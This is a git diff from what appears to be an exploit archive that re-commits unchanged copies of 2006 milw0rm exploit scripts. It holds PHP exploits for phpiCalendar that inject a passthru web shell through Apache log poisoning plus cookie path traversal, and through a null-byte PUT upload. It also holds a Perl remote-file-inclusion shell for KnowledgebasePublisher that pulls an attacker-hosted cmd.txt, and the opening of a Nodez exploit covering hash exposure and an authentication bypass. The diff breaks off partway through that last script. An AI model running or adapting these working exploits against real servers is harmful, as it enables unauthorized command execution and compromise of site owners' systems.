-echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to phpICal\r\n";
-echo "cmd:       a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /phpical/ ls -la\r\n";
-die;
-}
-
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$cmd="";$port=80;$proxy="";
-
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-echo "[1] Injecting some code in log files...\r\n";
-$CODE ='<?php ob_clean();echo 666;if (get_magic_quotes_gpc()) {$_GET[cmd]=striplashes($_GET[cmd]);}';
-$CODE.='passthru($_GET[cmd]);echo 666;die;?>';
-$packet.="GET ".$path.$CODE." HTTP/1.1\r\n";
-$packet.="User-Agent: ".$CODE."\r\n";
-$packet.="Host: ".$serv."\r\n";
-$packet.="Connection: close\r\n\r\n";
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-
-# fill with possible locations
-$paths= array (
-"../../../../../../../../../../var/log/httpd/access_log",
-"../../../../../../../../../../var/log/httpd/error_log",
-"../apache/logs/error.log",
-"../apache/logs/access.log",
-"../../apache/logs/error.log",
-"../../apache/logs/access.log",
-"../../../apache/logs/error.log",
-"../../../apache/logs/access.log",
-"../../../../../../../../../../etc/httpd/logs/acces_log",
-"../../../../../../../../../../etc/httpd/logs/acces.log",
-"../../../../../../../../../../etc/httpd/logs/error_log",
-"../../../../../../../../../../etc/httpd/logs/error.log",
-"../../../../../../../../../../var/www/logs/access_log",
-"../../../../../../../../../../var/www/logs/access.log",
-"../../../../../../../../../../usr/local/apache/logs/access_log",
-"../../../../../../../../../../usr/local/apache/logs/access.log",
-"../../../../../../../../../../var/log/apache/access_log",
-"../../../../../../../../../../var/log/apache/access.log",
-"../../../../../../../../../../var/log/access_log",
-"../../../../../../../../../../var/www/logs/error_log",
-"../../../../../../../../../../var/www/logs/error.log",
-"../../../../../../../../../../usr/local/apache/logs/error_log",
-"../../../../../../../../../../usr/local/apache/logs/error.log",
-"../../../../../../../../../../var/log/apache/error_log",
-"../../../../../../../../../../var/log/apache/error.log",
-"../../../../../../../../../../var/log/access_log",
-"../../../../../../../../../../var/log/error_log"
-);
-
-for ($i=0; $i<=count($paths)-1; $i++)
-{
-  $j=$i+2;
-  echo "[".$j."] Trying with ".$paths[$i]."%00\r\n";
-  $xpl=$paths[$i].chr(0x00);
-  $phpicalendar['cookie_language']=$xpl;
-  $phpicalendar['cookie_style']=$xpl;
-  $xpl=urlencode(serialize($phpicalendar));
-  $packet ="GET ".$p."day.php?cmd=".$cmd." HTTP/1.0\r\n";
-  $packet.="Host: ".$host."\r\n";
-  $packet.="Cookie: phpicalendar=".$xpl."; PHPSESSID=;\r\n";
-  $packet.="Connection: Close\r\n\r\n";
-  #debug, shows packets in a nice format
-  #echo quick_dump($packet);
-  sendpacketii($packet);
-  if (strstr($html,"666")){
-    echo "Exploit succeeded...\r\n";
-    $temp=explode("666",$html);
-    echo $temp[1];
-    die;
-  }
-}
-#if you are here...
-echo "Exploit failed...";
-?>
-
-# milw0rm.com [2006-03-15]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "php iCalendar <=2.21 \"cookie_language\"/\"cookie_style\" remote cmmnds xctn\r\n";
+echo "-> arbitrary local inclusion through cookies\r\n";
+echo "by rgod rgod<AT>autistici<DOT>org\r\n";
+echo "site: http://retrogod.altervista.org\r\n\r\n";
+
+# short explaination: phpICal stores language & template user preferences inside
+# cookies. Theese values are used to include files, but there is no check for
+# "../" chars... also you can break path trough a null char (%00) regardless of any
+# magic_quotes_gpc settings, because they are serialized & we have a stripslashes
+# on them. This code inject a shell in Apache log files, then tries to include
+# it through phpicalendar[cookie_language] & phpicalendar[cookie_style] cookies
+
+if ($argc<3) {
+echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to phpICal\r\n";
+echo "cmd:       a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /phpical/ ls -la\r\n";
+die;
+}
+
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$cmd="";$port=80;$proxy="";
+
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+echo "[1] Injecting some code in log files...\r\n";
+$CODE ='<?php ob_clean();echo 666;if (get_magic_quotes_gpc()) {$_GET[cmd]=striplashes($_GET[cmd]);}';
+$CODE.='passthru($_GET[cmd]);echo 666;die;?>';
+$packet.="GET ".$path.$CODE." HTTP/1.1\r\n";
+$packet.="User-Agent: ".$CODE."\r\n";
+$packet.="Host: ".$serv."\r\n";
+$packet.="Connection: close\r\n\r\n";
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+
+# fill with possible locations
+$paths= array (
+"../../../../../../../../../../var/log/httpd/access_log",
+"../../../../../../../../../../var/log/httpd/error_log",
+"../apache/logs/error.log",
+"../apache/logs/access.log",
+"../../apache/logs/error.log",
+"../../apache/logs/access.log",
+"../../../apache/logs/error.log",
+"../../../apache/logs/access.log",
+"../../../../../../../../../../etc/httpd/logs/acces_log",
+"../../../../../../../../../../etc/httpd/logs/acces.log",
+"../../../../../../../../../../etc/httpd/logs/error_log",
+"../../../../../../../../../../etc/httpd/logs/error.log",
+"../../../../../../../../../../var/www/logs/access_log",
+"../../../../../../../../../../var/www/logs/access.log",
+"../../../../../../../../../../usr/local/apache/logs/access_log",
+"../../../../../../../../../../usr/local/apache/logs/access.log",
+"../../../../../../../../../../var/log/apache/access_log",
+"../../../../../../../../../../var/log/apache/access.log",
+"../../../../../../../../../../var/log/access_log",
+"../../../../../../../../../../var/www/logs/error_log",
+"../../../../../../../../../../var/www/logs/error.log",
+"../../../../../../../../../../usr/local/apache/logs/error_log",
+"../../../../../../../../../../usr/local/apache/logs/error.log",
+"../../../../../../../../../../var/log/apache/error_log",
+"../../../../../../../../../../var/log/apache/error.log",
+"../../../../../../../../../../var/log/access_log",
+"../../../../../../../../../../var/log/error_log"
+);
+
+for ($i=0; $i<=count($paths)-1; $i++)
+{
+  $j=$i+2;
+  echo "[".$j."] Trying with ".$paths[$i]."%00\r\n";
+  $xpl=$paths[$i].chr(0x00);
+  $phpicalendar['cookie_language']=$xpl;
+  $phpicalendar['cookie_style']=$xpl;
+  $xpl=urlencode(serialize($phpicalendar));
+  $packet ="GET ".$p."day.php?cmd=".$cmd." HTTP/1.0\r\n";
+  $packet.="Host: ".$host."\r\n";
+  $packet.="Cookie: phpicalendar=".$xpl."; PHPSESSID=;\r\n";
+  $packet.="Connection: Close\r\n\r\n";
+  #debug, shows packets in a nice format
+  #echo quick_dump($packet);
+  sendpacketii($packet);
+  if (strstr($html,"666")){
+    echo "Exploit succeeded...\r\n";
+    $temp=explode("666",$html);
+    echo $temp[1];
+    die;
+  }
+}
+#if you are here...
+echo "Exploit failed...";
+?>
+
+# milw0rm.com [2006-03-15]
diff --git a/platforms/php/webapps/1586.php b/platforms/php/webapps/1586.php
index 10b11ddf2..1ef81cf2b 100755
--- a/platforms/php/webapps/1586.php
+++ b/platforms/php/webapps/1586.php
@@ -1,147 +1,147 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "php iCalendar <=2.21 publish.ical.php remote cmmnds xctn\r\n";
-echo "by rgod rgod<AT>autistici<DOT>org\r\n";
-echo "site: http://retrogod.altervista.org\r\n";
-echo "this works if \"phpicalendar_publishing\" is set to 1 in config.inc.php\r\n\r\n";
-
-# short explaination: phpICal lets users upload/delete files in WebDAV style
-# through PUT / DELETE method; calendars/ folder by default is not protected
-# by any authentication measure. Uploaded files have .ics extension but with
-# a trick you can break filename through a null char to have a php file
-# (this works always beacuse magic_quotes_gpc does not work with
-# HTTP_RAW_POST data)
-
-if ($argc<3) {
-echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to phpICal\r\n";
-echo "\r\n";
-echo "cmd:       a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /phpical/ ls -la\r\n";
-die;
-}
-
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$cmd="";$port=80;$proxy="";
-
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-$data="X-WR-CALNAME:suntzu.php".CHR(0x00)."F@kech4rs\n"; //one shot, kill fopen() & trim() php funcs
-$data.='
-<?php
-if (get_magic_quotes_gpc())
-{$_GET[cmd]=stripslashes($_GET[cmd]);}
-ini_set("max_execution_time",0);
-echo "Hi Master!";
-echo 666;
-passthru($_GET[cmd]);
-echo 666;
-?>
-';
-$packet ="PUT ".$p."calendars/publish.ical.php HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-#debug, shows packets in a nice format
-#echo quick_dump($packet);
-sendpacketii($packet);
-
-sleep(1);
-
-$packet="GET ".$p."calendars/suntzu.php?cmd=".$cmd." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-if (strstr($html,"666")) {
-echo "Exploit succeeded...\r\n";
-$temp=explode("666",$html);
-echo $temp[1];}
-else {echo "Exploit failed...";}
-?>
-
-# milw0rm.com [2006-03-15]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "php iCalendar <=2.21 publish.ical.php remote cmmnds xctn\r\n";
+echo "by rgod rgod<AT>autistici<DOT>org\r\n";
+echo "site: http://retrogod.altervista.org\r\n";
+echo "this works if \"phpicalendar_publishing\" is set to 1 in config.inc.php\r\n\r\n";
+
+# short explaination: phpICal lets users upload/delete files in WebDAV style
+# through PUT / DELETE method; calendars/ folder by default is not protected
+# by any authentication measure. Uploaded files have .ics extension but with
+# a trick you can break filename through a null char to have a php file
+# (this works always beacuse magic_quotes_gpc does not work with
+# HTTP_RAW_POST data)
+
+if ($argc<3) {
+echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to phpICal\r\n";
+echo "\r\n";
+echo "cmd:       a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /phpical/ ls -la\r\n";
+die;
+}
+
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$cmd="";$port=80;$proxy="";
+
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+$data="X-WR-CALNAME:suntzu.php".CHR(0x00)."F@kech4rs\n"; //one shot, kill fopen() & trim() php funcs
+$data.='
+<?php
+if (get_magic_quotes_gpc())
+{$_GET[cmd]=stripslashes($_GET[cmd]);}
+ini_set("max_execution_time",0);
+echo "Hi Master!";
+echo 666;
+passthru($_GET[cmd]);
+echo 666;
+?>
+';
+$packet ="PUT ".$p."calendars/publish.ical.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+#debug, shows packets in a nice format
+#echo quick_dump($packet);
+sendpacketii($packet);
+
+sleep(1);
+
+$packet="GET ".$p."calendars/suntzu.php?cmd=".$cmd." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+if (strstr($html,"666")) {
+echo "Exploit succeeded...\r\n";
+$temp=explode("666",$html);
+echo $temp[1];}
+else {echo "Exploit failed...";}
+?>
+
+# milw0rm.com [2006-03-15]
diff --git a/platforms/php/webapps/1587.pl b/platforms/php/webapps/1587.pl
index 47b02aa2e..ec605a8f9 100755
--- a/platforms/php/webapps/1587.pl
+++ b/platforms/php/webapps/1587.pl
@@ -1,88 +1,88 @@
-#!/usr/bin/perl
-##
-# KnowledgebasePublisher 1.2 Remote Code Execution Exploit
-# Bug Found By uid0
-## 
-# (c) 2006
-# ExploiterCode.com
-##
-# usage:
-# perl knowledgebase.pl <location of KnowledgebasePublisher> <cmd shell location <cmd shell variable>
-#
-# perl knowledgebase.pl http://site.com/knowledgebase/ http://site.com/cmd.txt cmd
-#
-# cmd shell example: <?passthru($_GET[cmd]);?>
-#
-# cmd shell variable: ($_GET[cmd]);
-##
-# hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, and everyone else!
-#
-# special shout to [ill]will! come back soon from jail!
-##
-# Contact: www.exploitercode.com irc.exploitercode.com uid0@exploitercode.com
-##
-
-use LWP::UserAgent;
-
-$Path = $ARGV[0];
-$Pathtocmd = $ARGV[1];
-$cmdv = $ARGV[2];
-
-if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
-
-head();
-
-while()
-{
-	print "[shell] \$";
-while(<STDIN>)
-        {
-                $cmd=$_;
-                chomp($cmd);
-         
-$xpl = LWP::UserAgent->new() or die;
-$req = HTTP::Request->new(GET =>$Path.'client/faq_1/PageController.php?dir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
-
-$res = $xpl->request($req);
-$return = $res->content;
-$return =~ tr/[\n]/[ê]/;
-
-if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
-
-elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
-	{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
-elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
-
-if($return =~ /(.+)<br.\/>.<b>Fatal.error/)
-
-
-{
-	$finreturn = $1;
-	$finreturn=~ tr/[ê]/[\n]/;
-	print "\r\n$finreturn\n\r";
-	last;
-}
-
-else {print "[shell] \$";}}}last;
-
-sub head()
- {
- print "\n============================================================================\r\n";
- print " *KnowledgebasePublisher 1.2 Remote Code Execution Exploit by ExploiterCode.com*\r\n";   
- print "============================================================================\r\n";
- }
-sub usage()
- {
- head();
- print " Usage: knowledgebase.pl <Site> <cmd shell> <cmd variable>\r\n\n";
- print " <Site> - Full path to KnowledgebasePublisher ex: http://www.site.com/knowledge/ \r\n";
- print " <cmd shell> - Path to Cmd Shell e.g http://www.site.com/cmd.txt \r\n";
- print " <cmd variable> - Command variable used in php shell \r\n";
- print "============================================================================\r\n";
- print "		         Bug Found by uid0\r\n";
- print "	www.exploitercode.com irc.exploitercode.com #exploitercode\r\n";
- print "============================================================================\r\n";
- exit();
- }
-
-# milw0rm.com [2006-03-15]
+#!/usr/bin/perl
+##
+# KnowledgebasePublisher 1.2 Remote Code Execution Exploit
+# Bug Found By uid0
+## 
+# (c) 2006
+# ExploiterCode.com
+##
+# usage:
+# perl knowledgebase.pl <location of KnowledgebasePublisher> <cmd shell location <cmd shell variable>
+#
+# perl knowledgebase.pl http://site.com/knowledgebase/ http://site.com/cmd.txt cmd
+#
+# cmd shell example: <?passthru($_GET[cmd]);?>
+#
+# cmd shell variable: ($_GET[cmd]);
+##
+# hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, and everyone else!
+#
+# special shout to [ill]will! come back soon from jail!
+##
+# Contact: www.exploitercode.com irc.exploitercode.com uid0@exploitercode.com
+##
+
+use LWP::UserAgent;
+
+$Path = $ARGV[0];
+$Pathtocmd = $ARGV[1];
+$cmdv = $ARGV[2];
+
+if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
+
+head();
+
+while()
+{
+	print "[shell] \$";
+while(<STDIN>)
+        {
+                $cmd=$_;
+                chomp($cmd);
+         
+$xpl = LWP::UserAgent->new() or die;
+$req = HTTP::Request->new(GET =>$Path.'client/faq_1/PageController.php?dir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
+
+$res = $xpl->request($req);
+$return = $res->content;
+$return =~ tr/[\n]/[ê]/;
+
+if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
+
+elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
+	{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
+elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
+
+if($return =~ /(.+)<br.\/>.<b>Fatal.error/)
+
+
+{
+	$finreturn = $1;
+	$finreturn=~ tr/[ê]/[\n]/;
+	print "\r\n$finreturn\n\r";
+	last;
+}
+
+else {print "[shell] \$";}}}last;
+
+sub head()
+ {
+ print "\n============================================================================\r\n";
+ print " *KnowledgebasePublisher 1.2 Remote Code Execution Exploit by ExploiterCode.com*\r\n";   
+ print "============================================================================\r\n";
+ }
+sub usage()
+ {
+ head();
+ print " Usage: knowledgebase.pl <Site> <cmd shell> <cmd variable>\r\n\n";
+ print " <Site> - Full path to KnowledgebasePublisher ex: http://www.site.com/knowledge/ \r\n";
+ print " <cmd shell> - Path to Cmd Shell e.g http://www.site.com/cmd.txt \r\n";
+ print " <cmd variable> - Command variable used in php shell \r\n";
+ print "============================================================================\r\n";
+ print "		         Bug Found by uid0\r\n";
+ print "	www.exploitercode.com irc.exploitercode.com #exploitercode\r\n";
+ print "============================================================================\r\n";
+ exit();
+ }
+
+# milw0rm.com [2006-03-15]
diff --git a/platforms/php/webapps/1588.php b/platforms/php/webapps/1588.php
index 391bd2dfc..becf30cc1 100755
--- a/platforms/php/webapps/1588.php
+++ b/platforms/php/webapps/1588.php
@@ -1,352 +1,352 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "Nodez 4.6.1.1 Mercury (possibly prior versions) multiple vulnerabilities\r\n";
-echo "by rgod rgod@autistici.org\r\n";
-echo "site: http://retrogod.altervista.org\r\n\r\n";
-
-/*
-   software:
-   site: nodez.greentinted.com/
-   description: Nodez - "An open source  (content management system), designed to
-   be flexible, expandable, and as modular as possible." (ndr: maybe too modular ;) )
-
-   short explaination:
-   i) 'op','bop','ext','eop' arguments are not properly sanitized before to
-   include files from local resources. You can include arbitrary files
-   breaking the path through a null char (%00). Also you can inject
-   php code in cache/ext/statman/log.gtdat file and launch commands
-   including it, poc:
-
-   http://[target]/[path]/index.php?node=system&op=extop&ext=statman&eop=/visitor&ip=[code]
-
-   http://[target]/[path]/index.php?node=system&op=blockop&block=3&bop=../../../../cache/ext/statman/log.gtdat%00
-   http://[target]/[path]/index.php?node=system&op=../../../cache/ext/statman/log.gtdat%00
-   http://[target]/[path]/index.php?node=system&op=extop&ext=statman&eop=../../../../cache/ext/statman/log.gtdat%00
-   http://[target]/[path]/index.php?node=system&op=extop&ext=../../cache/ext/statman/log.gtdat%00
-
-   ii)
-   to list all files on target system:
-   http://[target]/[path_to_nodez]/countlines.php
-
-   iii)last but not least, the most chritical issue:
-
-   you can view all admin/users md5 password hashes, ex:
-
-   http://[target]/[path_to_nodez]/cache/users/list.gtdat
-
-   (if you do not believe it, give a look to the online demo:
-   http://demo.opensourcecms.com/nodez/cache/users/list.gtdat)
-
-   this because nodez do not provide an .htaccess file for users folder
-
-   you don't need to force it to login as admin, you can
-   craft a $_POST['upass'] value,ex:
-
-   [admin_md5_hash][md5("rndval[numbers]")]
-
-   this string should be calculated by a nodez javascript, but
-   you can easily do by yourself (the second fragment is inside
-   login page, something like "rndval[random_numbers]" )
-
-   once you have an admin session cookie, you can create and edit php files
-   (System options -> Toolbox -> Super Edit) and launch commands from them
-
-   this exploit makes the dirty work for i) and iii)
-                                                                              */
-if ($argc<3) {
-echo "Usage: php ".$argv[0]." host path action cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to nodez\r\n";
-echo "action:    1 - through arbitrary local inclusion\r\n";
-echo "               (works with magic_quotes_gpc= Off)\r\n";
-echo "           2 - through admin authentication bypass\r\n";
-echo "               (no php.ini restriction, you need the\r\n";
-echo "               list.gtdat file)\r\n";
-echo "cmd:       a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
